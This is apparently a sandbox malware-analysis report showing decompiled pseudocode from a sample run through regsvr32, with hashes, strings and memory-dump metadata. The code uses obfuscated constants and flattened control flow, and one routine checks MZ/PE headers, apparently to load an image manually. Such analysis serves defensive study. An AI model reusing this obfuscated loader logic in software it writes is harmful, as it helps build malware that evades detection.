									_t385 =  *0x4f8221c; // 0x33fd420
									E04F736BB(_t385 + 4, __eflags, _v592, _v596, _t335 + 0x220, _v604, _v580, _t333, _v588,  &_v524);
									_v604 = 0xdbc03f;
									_v604 = _v604 | 0xa8fbd7f4;
									_t367 = 0x75;
									_v604 = _v604 / _t367;
									_v604 = _v604 ^ 0x0171534d;
									_v600 = 0xface55;
									_v600 = _v600 * 0x36;
									_v600 = _v600 + 0xd0ad;
									_v600 = _v600 >> 9;
									_v600 = _v600 ^ 0x001790e7;
									_v588 = 0x8da3bc;
									_t368 = 0x27;
									_v588 = _v588 * 0x6a;
									_v588 = _v588 ^ 0x3aa57000;
									_v608 = 0xf8398c;
									_v608 = _v608 / _t368;
									_v608 = _v608 ^ 0xd6879456;
									_v608 = _v608 ^ 0x65d64663;
									_v608 = _v608 ^ 0xb350346a;
									E04F6845B(_v604, _v600, _v588, _v608, _t333);
									_t401 = _t401 + 0x38;
									_t317 = 0xf249a;
									continue;
								} else {
									if(_t317 == 0xaee9a) {
										_v608 = 0x61bc26;
										_v608 = _v608 + 0xffff3e76;
										_v608 = _v608 + 0x11df;
										_v608 = _v608 * 0x2a;
										_v608 = _v608 ^ 0x0fef8cc3;
										_v588 = 0x1a8355;
										_v588 = _v588 * 0x14;
										_v588 = _v588 ^ 0x021e9619;
										_v604 = 0xc63ad0;
										_v604 = _v604 | 0xd1af7fb7;
										_t312 =  &_v604;
										 *_t312 = _v604 ^ 0xd1e7d3e5;
										__eflags =  *_t312;
										E04F68B6C(_v608, _t357, _v588, _v604);
									} else {
										if(_t317 != 0xf249a) {
											L15:
											__eflags = _t317 - 0x47232;
											if(_t317 != 0x47232) {
												continue;
											} else {
											}
										} else {
											_v604 = 0x86bf94;
											_v604 = _v604 + 0xffff12b3;
											_t373 = 0x7c;
											_v604 = _v604 * 0x23;
											_v604 = _v604 ^ 0x124bbfb4;
											_v596 = 0x61f06c;
											_t374 = 0x15;
											_v596 = _v596 / _t373;
											_v596 = _v596 | 0xe6161640;
											_v596 = _v596 ^ 0xe616df72;
											_v608 = 0x167780;
											_v608 = _v608 + 0xa8f1;
											_v608 = _v608 << 0xc;
											_v608 = _v608 + 0xffff9f47;
											_v608 = _v608 ^ 0x7206af44;
											_v600 = 0x599b1d;
											_push(_t374);
											_v600 = _v600 * 0x39;
											_v600 = _v600 ^ 0x55253c66;
											_v600 = _v600 | 0x73932577;
											_v600 = _v600 ^ 0x77db8ed6;
											_v592 = 0xe98e46;
											_v592 = _v592 >> 3;
											_v592 = _v592 + 0xebad;
											_v592 = _v592 / _t374;
											_v592 = _v592 ^ 0x000c8650;
											_v588 = 0xb38445;
											_v588 = _v588 >> 0xb;
											_v588 = _v588 ^ 0x000cbc89;
											_v580 = 0x929071;
											_v580 = _v580 ^ 0xe71906e0;
											_v580 = _v580 * 0x5f;
											_v580 = _v580 ^ 0xecc4e10f;
											_v576 = 0xb5e3f9;
											_v576 = _v576 | 0xf3dcfcef;
											_v576 = _v576 >> 9;
											_v576 = _v576 ^ 0x00788b8e;
											_t356 = E04F7602C(_v608, 0, _v600, _v592, _v604, _v588, _v596,  &_v524, _v580, _t374, _v576); // executed
											_t357 = _t356;
											_t401 = _t401 + 0x28;
											if(_t356 != 0xffffffff) {
												_t317 = 0x70a44;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t398;
				}
				_v600 = 0xe0bb1c;
				_v600 = _v600 >> 2;
				_v600 = _v600 + 0xffff5454;
				_v600 = _v600 ^ 0x302bcecd;
				_v600 = _v600 ^ 0x3017601e;
				_v596 = 0xd84cb2;
				_v596 = _v596 | 0x27714bab;
				_v596 = _v596 >> 0xc;
				_v596 = _v596 ^ 0x000dc8f1;
				_v608 = 0xd13691;
				_t358 = 0x5b;
				_v608 = _v608 / _t358;
				_t359 = 0x58;
				_v608 = _v608 / _t359;
				_v608 = _v608 + 0x946b;
				_v608 = _v608 ^ 0x0001d131;
				_v604 = 0x42a06d;
				_v604 = _v604 >> 7;
				_v604 = _v604 << 0xf;
				_t289 =  &_v604;
				 *_t289 = _v604 ^ 0x42a3f5cf;
				__eflags =  *_t289;
				E04F7786A(_v600, _v596, _v608, _v604,  &_v572);
				_t401 = _t401 + 0xc;
				_t317 = 0x6bbf8;
				goto L15;
			}

0x04f76f82
0x04f76f8a
0x04f76f8f
0x04f76f99
0x04f76f9b
0x04f76fa3
0x04f76fb0
0x04f77469
0x00000000
0x04f76fb6
0x04f76fbb
0x04f77457
0x04f7745b
0x04f77460
0x00000000
0x04f76fc1
0x04f76fc6
0x04f77380
0x04f77384
0x04f77388
0x04f7738d
0x04f77391
0x04f77395
0x04f77399
0x04f7739d
0x04f773a1
0x04f773a5
0x04f773a9
0x04f773ad
0x04f773b5
0x04f773bb
0x04f773c3
0x04f773c8
0x04f773d0
0x04f773d8
0x04f773e0
0x04f773e8
0x04f773f0
0x04f773f8
0x04f773fd
0x04f77402
0x04f77406
0x04f7740e
0x04f77416
0x04f7741e
0x04f77438
0x04f7743f
0x04f77443
0x04f77445
0x04f7744a
0x00000000
0x04f76fcc
0x04f76fd1
0x04f77148
0x04f77152
0x04f7715a
0x04f77162
0x04f7716a
0x04f77172
0x04f7717a
0x04f77182
0x04f7718a
0x04f77192
0x04f7719a
0x04f771a8
0x04f771ab
0x04f771af
0x04f771b7
0x04f771bf
0x04f771c7
0x04f771d4
0x04f771d8
0x04f771f5
0x04f771fa
0x04f77205
0x04f7720c
0x04f77218
0x04f77220
0x04f77228
0x04f77230
0x04f77238
0x04f77240
0x04f77248
0x04f77250
0x04f77258
0x04f77260
0x04f77268
0x04f77270
0x04f77278
0x04f77280
0x04f77288
0x04f77290
0x04f772a6
0x04f772b5
0x04f772c3
0x04f772c8
0x04f772d2
0x04f772e0
0x04f772e3
0x04f772e7
0x04f772ef
0x04f772fc
0x04f77300
0x04f77308
0x04f7730d
0x04f77315
0x04f77326
0x04f77328
0x04f7732c
0x04f77334
0x04f77342
0x04f77346
0x04f7734e
0x04f77356
0x04f7736e
0x04f77373
0x04f77376
0x00000000
0x04f76fd7
0x04f76fdc
0x04f77531
0x04f7753b
0x04f77543
0x04f77550
0x04f77554
0x04f7755c
0x04f77569
0x04f7756d
0x04f77575
0x04f7757d
0x04f77585
0x04f77585
0x04f77585
0x04f77599
0x04f76fe2
0x04f76fe7
0x04f77524
0x04f77524
0x04f77529
0x00000000
0x00000000
0x04f7752f
0x04f76fed
0x04f76fed
0x04f76ff7
0x04f77006
0x04f77009
0x04f7700d
0x04f77015
0x04f77023
0x04f77024
0x04f7702a
0x04f77032
0x04f7703a
0x04f77042
0x04f7704a
0x04f7704f
0x04f77057
0x04f7705f
0x04f7706c
0x04f7706d
0x04f77071
0x04f77079
0x04f77081
0x04f77089
0x04f77091
0x04f77096
0x04f770a6
0x04f770aa
0x04f770b2
0x04f770ba
0x04f770bf
0x04f770c7
0x04f770cf
0x04f770dc
0x04f770e4
0x04f770ec
0x04f770f4
0x04f770fc
0x04f77101
0x04f7712b
0x04f77130
0x04f77132
0x04f77138
0x04f7713e
0x00000000
0x04f7713e
0x04f77138
0x04f76fe7
0x04f76fdc
0x04f76fd1
0x04f76fc6
0x04f76fbb
0x04f775ac
0x04f775ac
0x04f77470
0x04f7747a
0x04f7747f
0x04f77487
0x04f7748f
0x04f77497
0x04f7749f
0x04f774a7
0x04f774ac
0x04f774b4
0x04f774c2
0x04f774c7
0x04f774d1
0x04f774d4
0x04f774dc
0x04f774e4
0x04f774ec
0x04f774f4
0x04f774f9
0x04f774fe
0x04f774fe
0x04f774fe
0x04f77517
0x04f7751c
0x04f7751f
0x00000000

Strings

yLy, xrefs: 04F7717A
pN, xrefs: 04F77248
L, xrefs: 04F77218
@.h, xrefs: 04F771AF
)C, xrefs: 04F77250
f<%U, xrefs: 04F77071
&}R, xrefs: 04F773B5

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFileFindHandleInformationNotification
String ID: &}R$)C$@.h$L$f<%U$pN$yLy
API String ID: 4008528783-3709061547
Opcode ID: 9f06024598ebff642c64e6551251b6c4190523ade7a376e3a324cad83bc74b8d
Instruction ID: d150bb890d3518eec683af8b6699db29df9fb1e9fe2652b5f33873056d13a082
Opcode Fuzzy Hash: 9f06024598ebff642c64e6551251b6c4190523ade7a376e3a324cad83bc74b8d
Instruction Fuzzy Hash: 1DF113B15093419FC358CF25D98940BBBE1FBC8758F109A1DF09AA6260D3B5DA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F77EB9 Relevance: 9.0, Strings: 7, Instructions: 275
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E04F77EB9() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t269;
				void* _t270;
				signed int _t275;
				intOrPtr _t285;
				intOrPtr _t290;
				signed int _t293;
				intOrPtr _t303;
				void* _t306;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				void* _t333;
				intOrPtr _t336;
				intOrPtr _t338;
				intOrPtr _t341;
				void* _t349;
				signed int* _t353;

				_t353 =  &_v32;
				_v12 = 0x86ea6;
				_t306 = 0;
				_v8 = 0x30482;
				_t349 = 0x13f20;
				_v4 = 0x34d0d;
				while(1) {
					L1:
					_t269 = 0x1bc4e;
					do {
						L2:
						if(_t349 == 0x3e92) {
							_v24 = 0x4f5c69;
							_v24 = _v24 >> 0xa;
							_v24 = _v24 + 0xffffae25;
							_v24 = _v24 ^ 0xfffda161;
							_v32 = 0xcb5092;
							_v32 = _v32 | 0xcfa07f28;
							_v32 = _v32 + 0xa4e5;
							_v32 = _v32 ^ 0xcfe13fc4;
							_v28 = 0x26961;
							_v28 = _v28 ^ 0x1dabbaed;
							_v28 = _v28 + 0xffff1b68;
							_v28 = _v28 ^ 0x1da50140;
							_v20 = 0xb77b6d;
							_v20 = _v20 | 0x5f114e5d;
							_v20 = _v20 ^ 0x5fb28fbb;
							_t270 = E04F7D6A7(_v24, _v32, _v28, 0x4f614e4, _v20);
							_v32 = 0xdb4b79;
							_t310 = 0x34;
							_v32 = _v32 / _t310;
							_v32 = _v32 | 0x8f99b892;
							_v32 = _v32 + 0x5257;
							_v32 = _v32 ^ 0x8f918201;
							_v28 = 0xfe3e66;
							_v28 = _v28 + 0xffffdd57;
							_v28 = _v28 ^ 0x00faed75;
							_v24 = 0xbee6f4;
							_v24 = _v24 << 0xe;
							_v24 = _v24 + 0xffff9699;
							_v24 = _v24 ^ 0xb9b626ac;
							_v20 = 0x5a425c;
							_t311 = 0x65;
							_v20 = _v20 / _t311;
							_v20 = _v20 ^ 0x0008ae85;
							_t275 = E04F62D6F( &_v16, _v32, _v28, _v24, _t270, _t311, _v20, 0); // executed
							_v20 = 0xa68296;
							__eflags = _t275;
							_t349 =  ==  ? 0x1bc4e : 0x88196;
							_v20 = _v20 >> 9;
							_v20 = _v20 + 0xffffb95e;
							_v20 = _v20 ^ 0x000ac278;
							_v28 = 0x5a4f6f;
							_v28 = _v28 >> 0x10;
							_t313 = 0x2f;
							_v28 = _v28 * 0x5a;
							_v28 = _v28 + 0xb5c0;
							_v28 = _v28 ^ 0x000ee45d;
							_v32 = 0x3c8f4f;
							_v32 = _v32 / _t313;
							_v32 = _v32 + 0xffffc81d;
							_v32 = _v32 + 0xffff8de4;
							_v32 = _v32 ^ 0x00063299;
							_v24 = 0xa22dcd;
							_v24 = _v24 + 0xffff348d;
							_v24 = _v24 + 0xffffae5d;
							_t234 =  &_v24;
							 *_t234 = _v24 ^ 0x00aec6b0;
							__eflags =  *_t234;
							_t308 = _v20;
							E04F6845B(_t308, _v28, _v32, _v24, _t270);
							_t353 =  &(_t353[0xc]);
							_t269 = 0x1bc4e;
							goto L13;
						}
						if(_t349 == 0x13f20) {
							_v32 = 0xedeb2a;
							_v32 = _v32 >> 5;
							_v32 = _v32 + 0x3f94;
							_push(_t308);
							_t333 = 0x28;
							_v32 = _v32 * 0x76;
							_v32 = _v32 ^ 0x0384f1c3;
							_v28 = 0x4c9833;
							_v28 = _v28 ^ 0xf3890c97;
							_v28 = _v28 ^ 0xe3716d82;
							_v28 = _v28 ^ 0x10b78c59;
							 *0x4f82b08 = E04F73EE6(_t308, _t333, __eflags);
							_v20 = 0x5da3d1;
							_v20 = _v20 >> 9;
							_v20 = _v20 ^ 0x00006ed1;
							_t285 =  *0x4f82b08; // 0x33c6288
							 *((intOrPtr*)(_t285 + 0x24)) = _v20;
							_v32 = 0x44c05;
							_t315 = 0x5e;
							_v32 = _v32 / _t315;
							_v32 = _v32 | 0xcf34d3cb;
							_v32 = _v32 ^ 0xcf30fe4f;
							_v28 = 0xfcbd77;
							_v28 = _v28 | 0xf6727ff7;
							_v28 = _v28 ^ 0xf6fe33ce;
							_t336 =  *0x4f82b08; // 0x33c6288
							_t290 = E04F73EE6(_t315,  *((intOrPtr*)(_t336 + 0x24)), __eflags);
							_t338 =  *0x4f82b08; // 0x33c6288
							_t349 = 0x3e92;
							_t308 =  *((intOrPtr*)(_t338 + 0x24)) + _t290;
							 *((intOrPtr*)(_t338 + 0x20)) = _t290;
							 *((intOrPtr*)(_t338 + 0x18)) = _t290;
							 *((intOrPtr*)(_t338 + 0x14)) = _t290;
							 *(_t338 + 4) = _t308;
							while(1) {
								L1:
								_t269 = 0x1bc4e;
								goto L2;
							}
						}
						if(_t349 == _t269) {
							_v32 = 0xdc1607;
							_t318 = 0x1e;
							_push(_t318);
							_v32 = _v32 / _t318;
							_v32 = _v32 + 0xd21a;
							_v32 = _v32 >> 0x10;
							_v32 = _v32 ^ 0x000b8985;
							_v24 = 0x597b03;
							_v24 = _v24 ^ 0x412e110f;
							_v24 = _v24 ^ 0x417059dd;
							_v20 = 0xb55065;
							_v20 = _v20 >> 8;
							_v20 = _v20 ^ 0x000b3303;
							_t341 =  *0x4f82b08; // 0x33c6288
							_t308 = _v32;
							_t293 = E04F7C42E(_t308,  *((intOrPtr*)(_t341 + 0x24)),  *((intOrPtr*)(_t341 + 0x20)), _v24, _v16, _v20);
							_t353 =  &(_t353[5]);
							__eflags = _t293;
							if(__eflags != 0) {
								_t349 = 0x88196;
							} else {
								_t349 = 0x55a40;
								_t306 = 1;
							}
							goto L1;
						}
						if(_t349 == 0x55a40) {
							_v28 = 0x5ffc63;
							_v28 = _v28 << 0xb;
							_v28 = _v28 + 0xffff39fc;
							_v28 = _v28 >> 7;
							_v28 = _v28 ^ 0x01fc0df4;
							_v20 = 0x421cc4;
							_v20 = _v20 ^ 0x7a22dfee;
							_t319 = 0x4e;
							_v20 = _v20 / _t319;
							_v20 = _v20 ^ 0x01994fa3;
							_v24 = 0x565ade;
							_v24 = _v24 * 0x73;
							_t263 =  &_v24;
							 *_t263 = _v24 ^ 0x26c036a1;
							__eflags =  *_t263;
							E04F75C41(_v28, _v16, _v20, _v24);
							L16:
							return _t306;
						}
						_t362 = _t349 - 0x88196;
						if(_t349 != 0x88196) {
							goto L13;
						}
						_v28 = 0xdf8d52;
						_v28 = _v28 ^ 0x9c54513e;
						_v28 = _v28 ^ 0x9c8965a9;
						_v24 = 0xb1ffd6;
						_v24 = _v24 | 0xa13971f2;
						_t321 = 0x50;
						_v24 = _v24 * 0x6e;
						_v24 = _v24 ^ 0x7de0427e;
						_v20 = 0xcb46de;
						_v20 = _v20 * 0x15;
						_v20 = _v20 / _t321;
						_v20 = _v20 ^ 0x00323d85;
						_t303 =  *0x4f82b08; // 0x33c6288
						E04F7E4B2(_v28, _v24, _t362, _v20,  *((intOrPtr*)(_t303 + 0x20)));
						_v28 = 0x5d6adf;
						_v28 = _v28 >> 3;
						_v28 = _v28 ^ 0x000e3158;
						_v24 = 0xe522b8;
						_v24 = _v24 ^ 0x104fc064;
						_v24 = _v24 >> 0xd;
						_v24 = _v24 ^ 0x0001fd05;
						_v20 = 0xc606f2;
						_v20 = _v20 + 0xffff6a9f;
						_v20 = _v20 + 0x7a21;
						_v20 = _v20 ^ 0x00c2133f;
						E04F7E4B2(_v28, _v24, _t362, _v20,  *0x4f82b08);
						goto L16;
						L13:
						__eflags = _t349 - 0xec18b;
					} while (__eflags != 0);
					goto L16;
				}
			}

0x04f77eb9
0x04f77ebf
0x04f77ec7
0x04f77eca
0x04f77ed2
0x04f77ed7
0x04f77ee4
0x04f77ee4
0x04f77ee4
0x04f77ee9
0x04f77ee9
0x04f77eef
0x04f78192
0x04f7819a
0x04f7819f
0x04f781a7
0x04f781af
0x04f781b7
0x04f781bf
0x04f781c7
0x04f781cf
0x04f781d7
0x04f781df
0x04f781e7
0x04f781ef
0x04f781f7
0x04f781ff
0x04f7821c
0x04f78221
0x04f78236
0x04f7823b
0x04f78241
0x04f78249
0x04f78251
0x04f78259
0x04f78261
0x04f78269
0x04f78271
0x04f78279
0x04f7827e
0x04f78286
0x04f7828e
0x04f7829a
0x04f7829f
0x04f782a3
0x04f782c1
0x04f782c6
0x04f782ce
0x04f782d7
0x04f782da
0x04f782df
0x04f782e9
0x04f782f1
0x04f782f9
0x04f78305
0x04f78306
0x04f7830a
0x04f78312
0x04f7831a
0x04f78328
0x04f7832c
0x04f78334
0x04f7833c
0x04f78344
0x04f7834c
0x04f78354
0x04f7835c
0x04f7835c
0x04f7835c
0x04f78371
0x04f78375
0x04f7837a
0x04f7837d
0x00000000
0x04f7837d
0x04f77efb
0x04f7809e
0x04f780a6
0x04f780ab
0x04f780b8
0x04f780bb
0x04f780bc
0x04f780c0
0x04f780c8
0x04f780d0
0x04f780d8
0x04f780e0
0x04f780f5
0x04f780fc
0x04f78104
0x04f78109
0x04f78115
0x04f7811c
0x04f7811f
0x04f7812b
0x04f7812e
0x04f78132
0x04f7813a
0x04f78142
0x04f7814a
0x04f78152
0x04f78162
0x04f7816b
0x04f78170
0x04f78176
0x04f7817f
0x04f78181
0x04f78184
0x04f78187
0x04f7818a
0x04f77ee4
0x04f77ee4
0x04f77ee4
0x00000000
0x04f77ee4
0x04f77ee4
0x04f77f03
0x04f78008
0x04f78018
0x04f7801b
0x04f7801c
0x04f78020
0x04f78028
0x04f7802d
0x04f78035
0x04f7803d
0x04f78045
0x04f7804d
0x04f78055
0x04f7805a
0x04f7806e
0x04f78074
0x04f7807e
0x04f78083
0x04f78086
0x04f78088
0x04f78097
0x04f7808a
0x04f7808c
0x04f78091
0x04f78091
0x00000000
0x04f78088
0x04f77f0f
0x04f78390
0x04f7839a
0x04f7839f
0x04f783a7
0x04f783ac
0x04f783b4
0x04f783bc
0x04f783ca
0x04f783cd
0x04f783d1
0x04f783d9
0x04f783e6
0x04f783ea
0x04f783ea
0x04f783ea
0x04f78402
0x04f7840d
0x04f78413
0x04f78413
0x04f77f15
0x04f77f17
0x00000000
0x00000000
0x04f77f1d
0x04f77f27
0x04f77f2f
0x04f77f37
0x04f77f3f
0x04f77f4e
0x04f77f4f
0x04f77f53
0x04f77f5b
0x04f77f68
0x04f77f72
0x04f77f76
0x04f77f7e
0x04f77f92
0x04f77f97
0x04f77f9f
0x04f77fa4
0x04f77fac
0x04f77fb4
0x04f77fbc
0x04f77fc1
0x04f77fc9
0x04f77fd1
0x04f77fd9
0x04f77fe1
0x04f77ffb
0x00000000
0x04f78382
0x04f78382
0x04f78382
0x00000000
0x04f7838e

Strings

!z, xrefs: 04F77FD9
oOZ, xrefs: 04F782F1
WR, xrefs: 04F78249
\BZ, xrefs: 04F7828E
i\O, xrefs: 04F78192
*, xrefs: 04F7809E
~B}, xrefs: 04F77F53

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !z$*$WR$\BZ$i\O$oOZ$~B}
API String ID: 0-3646837760
Opcode ID: 9611ab8990002db88158e0e3d2f36c50534e5399604ebaf7a7287198e243cded
Instruction ID: 9db27fa3f9f6812d2f8afc0bbf5f9dc932ed789f33d93cf659a431fd8d70f9ea
Opcode Fuzzy Hash: 9611ab8990002db88158e0e3d2f36c50534e5399604ebaf7a7287198e243cded
Instruction Fuzzy Hash: BCD114B15093429FC348CF25D94940BBBE1FBD8748F104A1EF099A6260D7B9DA4ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 10004BB0 Relevance: 7.2, APIs: 4, Instructions: 1176
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10004BB0() {
				void* __esi;
				signed int _t350;
				signed int _t380;
				void* _t398;
				signed int _t399;
				intOrPtr* _t405;
				signed int _t419;
				intOrPtr _t423;
				signed int _t435;
				void* _t440;
				signed int _t442;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t460;
				void* _t464;
				signed int _t465;
				signed int _t476;
				signed int _t484;
				signed int _t491;
				void* _t503;
				signed int _t505;
				signed int _t506;
				intOrPtr _t516;
				signed int _t517;
				signed int _t525;
				signed int _t527;
				signed int _t529;
				signed int _t552;
				signed int _t557;
				void* _t562;
				signed int _t563;
				signed int _t564;
				void* _t573;
				signed int _t574;
				void* _t575;
				signed int _t576;
				void* _t577;
				signed int _t586;
				void* _t591;
				signed int _t592;
				signed int _t596;
				intOrPtr _t599;
				intOrPtr _t600;
				void* _t601;
				intOrPtr _t602;
				intOrPtr _t604;
				signed int _t605;
				signed int _t614;
				signed int _t616;
				signed int _t617;
				intOrPtr _t618;
				signed int _t619;
				signed int _t622;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t643;
				signed int _t644;
				intOrPtr _t652;
				signed int _t654;
				signed int _t656;
				signed int _t669;
				signed int _t670;
				signed int _t692;
				signed int _t702;
				signed int _t703;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t722;
				signed int _t744;
				signed int _t760;
				signed int _t768;
				signed int _t780;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t801;
				signed int _t802;
				signed int _t805;
				signed int _t808;
				signed int _t809;
				signed int _t819;
				signed int _t820;
				signed int _t823;
				signed int _t826;
				signed int _t827;
				intOrPtr _t831;
				signed int _t832;
				void* _t846;
				signed int _t847;
				signed int _t848;
				signed int _t851;
				signed int _t857;
				signed int _t861;
				signed int _t864;
				signed int _t871;
				signed int _t877;
				signed int _t891;
				signed int _t910;
				signed int _t917;
				signed int _t931;
				signed int _t947;
				signed int _t956;
				signed int _t957;
				signed int _t981;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int _t1010;
				signed int _t1011;
				signed int _t1013;
				signed int _t1014;
				signed int _t1021;
				signed int _t1050;
				signed int _t1052;
				signed int _t1054;
				signed int _t1058;
				signed int _t1063;
				signed int _t1067;
				signed int _t1068;
				signed int _t1072;
				signed int _t1073;
				signed int _t1077;
				signed int _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1107;
				signed int _t1114;
				signed int _t1116;
				intOrPtr _t1117;
				signed int _t1122;
				signed int _t1124;
				signed int _t1131;
				signed int _t1136;
				signed int _t1137;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1144;
				signed int _t1155;
				signed int _t1157;
				signed int _t1163;
				signed int _t1173;
				signed int _t1185;
				signed int _t1224;
				intOrPtr* _t1235;
				signed int _t1241;
				signed int _t1262;
				signed int _t1264;
				signed int _t1271;
				signed int _t1273;
				signed int _t1274;
				signed int _t1276;
				signed int _t1286;
				signed int _t1292;
				signed int _t1302;
				intOrPtr _t1310;
				signed int _t1315;
				signed int _t1350;
				void* _t1351;
				void* _t1352;
				void* _t1353;
				void* _t1354;
				void* _t1355;

				_t910 =  *0x10036118; // 0x0
				_t616 =  *0x10036114; // 0x0
				 *(_t1351 + 8) = _t616 * _t616;
				_t350 =  *0x10036110; // 0x0
				 *(_t1351 + 0x10) = _t350 * _t910;
				 *(_t1351 + 8) = _t350 + _t350 * 2;
				_t692 =  *0x10036120; // 0x0
				 *((intOrPtr*)(_t1351 + 0x20)) = _t692 + _t692 * 2;
				_t9 = _t910 + 0x3fffffff; // 0x3fffffff
				_t1114 =  *0x1003610c; // 0x0
				_t1185 =  *0x1003611c; // 0x0
				_t14 = _t1114 + 4; // 0x4
				_t917 =  *0x10036120; // 0x0
				_t1262 =  *0x10036118; // 0x0
				 *((intOrPtr*)(_t1351 + 0x18)) = 0;
				if((( *((intOrPtr*)(_t1351 + 0x14)) + 2) * _t1185 -  *((intOrPtr*)(_t1351 + 0x1c)) + 2) * _t1185 + (( *((intOrPtr*)(_t1351 + 0x14)) + 2) * _t1185 -  *((intOrPtr*)(_t1351 + 0x1c)) + 2) * _t1185 * 2 + ((3 -  *(_t1351 + 0x10)) * _t1262 + 3) * _t616 -  *(_t1351 + 0x10) +  *((intOrPtr*)(_t1351 + 0x24)) +  *((intOrPtr*)(_t1351 + 0x64)) < ((4 + _t1114 * 4) * _t692 + (_t9 * _t616 + _t1114) * 4 - _t1185 + 0xb) * _t1185 + (( ~(_t910 + _t616) << 2) - _t14 * _t350 + 4) * _t1114 + (_t616 - (_t917 << 2) + 7) *  *0x10036120 + (0x10 - _t616) * 4 - _t350 -  *0x10036118) {
					L29:
					return 0;
				} else {
					_t702 =  *0x10036120; // 0x0
					 *(_t1351 + 0x28) = _t702 * _t1262;
					_t29 = (((_t702 * _t616 * _t1185 * _t1114 - _t1262) *  *0x10036110 - _t1114 + 2) * _t616 - _t1185 +  *(_t1351 + 0x28) +  *0x10036110) * 2; // -268633797
					if(( *( *(_t1351 + 0x60)) & 0x0000ffff) != ((_t702 * _t616 * _t1185 * _t1114 - _t1262) *  *0x10036110 - _t1114 + 2) * _t616 - _t1185 +  *(_t1351 + 0x28) +  *0x10036110 + _t29 + 0x5a4d) {
						goto L29;
					} else {
						 *(_t1351 + 0x30) = ( *(_t1351 + 0x60))[0x1e];
						 *((intOrPtr*)(_t1351 + 0x20)) = _t1262 + _t1262 * 2;
						_t931 =  *0x10036110; // 0x0
						_t703 =  *0x10036110; // 0x0
						_t380 = _t1185 * _t1185;
						 *(_t1351 + 0x2c) = _t380;
						_t49 = (_t1185 * _t1114 + _t1185 * _t1114 * 2 -  *(_t1351 + 0x10) - 3) * _t616 +  *(_t1351 + 0x30) + _t380 - (_t931 + _t702 + 3) * _t702 + _t703 + (_t380 - (_t931 + _t702 + 3) * _t702 + _t703) * 2 + 0xf8; // 0x1
						_t398 = E10002560((1 - _t1114) *  *0x10036120 - _t1185 + _t1185 -  *0x10036110 - _t1262 + 2 - ( *((intOrPtr*)(_t1351 + 0x24)) + 3) * _t616 +  *((intOrPtr*)(_t1351 + 0x68)), ( *(_t1351 + 0x10) + 0xfffffff7) * _t1262 + _t49);
						_t1352 = _t1351 + 8;
						if(_t398 == 0) {
							goto L29;
						} else {
							_t399 =  *0x10036110; // 0x0
							_t947 =  *0x10036120; // 0x0
							_t405 = (4 - _t1114 * 4) *  *0x10036110 +  *((intOrPtr*)( *((intOrPtr*)(_t1352 + 0x60)) + 0x3c)) + (( *(_t1352 + 0x14) - _t399 - 2) *  *0x10036120 - _t616) * 4 +  *((intOrPtr*)(_t1352 + 0x60));
							_t714 = _t616 * _t1114;
							 *(_t1352 + 0x30) = _t714;
							_t715 =  *0x10036110; // 0x0
							 *((intOrPtr*)(_t1352 + 0x10)) = _t405;
							if( *_t405 != ((_t947 + _t714) * 0x7fffffff +  *(_t1352 + 0x2c) +  *(_t1352 + 0x1c)) * _t715 + _t616 + _t1185 + ((_t947 + _t714) * 0x7fffffff +  *(_t1352 + 0x2c) +  *(_t1352 + 0x1c)) * _t715 + _t616 + _t1185 + 0x4550) {
								goto L29;
							} else {
								_t956 =  *0x10036120; // 0x0
								_t716 = _t715 * _t956;
								_t957 = _t956 * _t1185;
								 *(_t1352 + 0x2c) = _t716;
								 *(_t1352 + 0x1c) = _t716 * _t1114;
								 *(_t1352 + 0x34) = _t957;
								if(( *(_t405 + 4) & 0x0000ffff) != _t957 -  *(_t1352 + 0x14) * _t1185 -  *(_t1352 + 0x1c) - _t1262 + _t957 -  *(_t1352 + 0x14) * _t1185 -  *(_t1352 + 0x1c) - _t1262 + 0x14c) {
									goto L29;
								} else {
									 *(_t1352 + 0x1c) =  *(_t405 + 0x38);
									_t722 =  *0x10036110; // 0x0
									if(( *(_t1352 + 0x1c) & (_t1185 + _t1185 * 0x00000002 -  *((intOrPtr*)(_t1352 + 0x20)) - 0x00000003) * _t722 + (0x00000003 -  *((intOrPtr*)(_t1352 + 0x24))) * _t1185 - (_t616 + _t616 * 0x00000002 << 0x00000001) + 0x00000001) != 0) {
										goto L29;
									} else {
										_t86 = _t1185 - 1; // -1
